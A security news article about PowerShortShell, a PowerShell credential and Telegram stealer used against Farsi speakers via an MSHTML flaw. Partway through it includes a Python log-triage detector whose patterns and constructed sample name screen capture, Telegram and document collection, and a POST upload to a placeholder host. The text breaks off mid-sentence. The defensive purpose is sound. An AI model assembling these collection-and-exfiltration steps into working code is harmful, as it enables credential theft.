The attacks started in July 2021, with threat actors exploiting the Microsoft MSHTML vulnerability to target overseas Iranians.
SafeBreach Labs researchers discovered a new Iranian threat actor attempting to steal the Instagram and Google (Gmail) login credentials of Farsi speakers worldwide. The threat actor is using a new PowerShell-based stealer that SafeBreach Labs has dubbed PowerShortShell.
The attacks were initially reported in September by the Shadow Chase Group in a Twitter post. According to the group, a critical flaw in the Microsoft MSHTML platform was being exploited to launch different types of cyberattacks.
What is PowerShortShell?
PowerShortShell is an information stealer that also collects system information from infected devices (transmitted to the attacker together with the stolen credentials) and performs Telegram surveillance.
The stealer is so named because it is a short PowerShell script with powerful "collection capabilities," the researchers noted. Within roughly 150 lines it gives the attacker a large amount of sensitive information, including screen captures, collected documents, Telegram files, and extensive details about the victim's environment.
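The capability mix described above (screen capture, document and Telegram file collection, host reconnaissance, and upload of the results) is what a defender would look for in PowerShell script-block logs. The following Python triage heuristic is an added example and is not SafeBreach's code or indicators: the regex signatures, the `ScriptBlockEvent` structure and the sample log fragments are all assumptions constructed for illustration, and the verdict thresholds are a starting point to tune against your own environment.

```python
"""Heuristic triage of PowerShell script-block log text for stealer-like behaviour.

Added example: the capability signatures below are assumed, generic heuristics,
not SafeBreach's detection logic or indicators for PowerShortShell.
"""
import re
from dataclasses import dataclass

# Capability signatures, grouped by what the script could be doing (assumed patterns).
CAPABILITY_PATTERNS = {
    "screen_capture": [r"CopyFromScreen", r"System\.Drawing\.Bitmap", r"PrimaryScreen"],
    "telegram_files": [r"(?i)Telegram Desktop", r"(?i)\\tdata\b"],
    "document_sweep": [r"Get-ChildItem[^\n]*-Recurse[^\n]*\.(docx?|pdf|xlsx?)"],
    "host_recon":     [r"Get-WmiObject", r"Get-CimInstance", r"Get-NetIPAddress", r"\bsysteminfo\b"],
    "http_upload":    [r"Invoke-(WebRequest|RestMethod)[^\n]*-Method\s+Post", r"\.UploadFile\("],
}
# Capabilities that gather data; combined with an upload they form the stealer pattern.
COLLECTION = {"screen_capture", "telegram_files", "document_sweep", "host_recon"}


@dataclass
class ScriptBlockEvent:
    """Minimal stand-in for a PowerShell script-block logging record (hypothetical shape)."""
    record_id: int
    path: str
    text: str


def capabilities(text: str) -> set:
    """Return the set of capability labels whose signatures appear in the script text."""
    return {cap for cap, pats in CAPABILITY_PATTERNS.items()
            if any(re.search(p, text) for p in pats)}


def classify(event: ScriptBlockEvent) -> dict:
    """Score one event: collection plus upload is 'stealer_like', collection alone is 'review'."""
    caps = capabilities(event.text)
    collected = caps & COLLECTION
    if "http_upload" in caps and len(collected) >= 2:
        verdict = "stealer_like"
    elif len(collected) >= 2:
        verdict = "review"
    else:
        verdict = "benign"
    return {"record_id": event.record_id, "path": event.path,
            "capabilities": sorted(caps), "verdict": verdict}


def triage(events) -> list:
    """Classify every event, preserving input order."""
    return [classify(e) for e in events]


# Constructed sample records; the script text is fragmentary and not working code.
SAMPLE_EVENTS = [
    ScriptBlockEvent(101, r"C:\Scripts\inventory.ps1", r"""
Get-CimInstance Win32_OperatingSystem | Select-Object Caption, Version
Invoke-RestMethod -Uri https://inventory.example.invalid/api/hosts -Method Get
"""),
    ScriptBlockEvent(102, r"C:\Users\user\AppData\Local\Temp\x.ps1", r"""
# constructed fragment for detection testing only
[System.Windows.Forms.Screen]::PrimaryScreen
Get-ChildItem "$env:APPDATA\Telegram Desktop\tdata" -Recurse
Get-ChildItem $env:USERPROFILE -Recurse -Include *.docx,*.pdf
Get-NetIPAddress
Invoke-WebRequest -Uri http://collector.example.invalid/upload -Method Post -Body $blob
"""),
    ScriptBlockEvent(103, r"C:\Scripts\audit.ps1", r"""
Get-ChildItem C:\Shares -Recurse -Include *.xlsx | Measure-Object
systeminfo | Out-File report.txt
"""),
]

if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        print(result["record_id"], result["verdict"], result["path"], result["capabilities"])
```

Only the combination of several collection capabilities with an outbound POST is treated as stealer-like; a single signature such as `Get-CimInstance` is routine in administrative scripts and would generate noise on its own. In practice you would feed this the decoded script text from script-block logging (PowerShell Event ID 4104), since a short stealer script may be delivered obfuscated and only appear in clear form there.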
About the Phishing Campaign
According to SafeBreach Labs’ researcher Tomer Bar, the attacks started in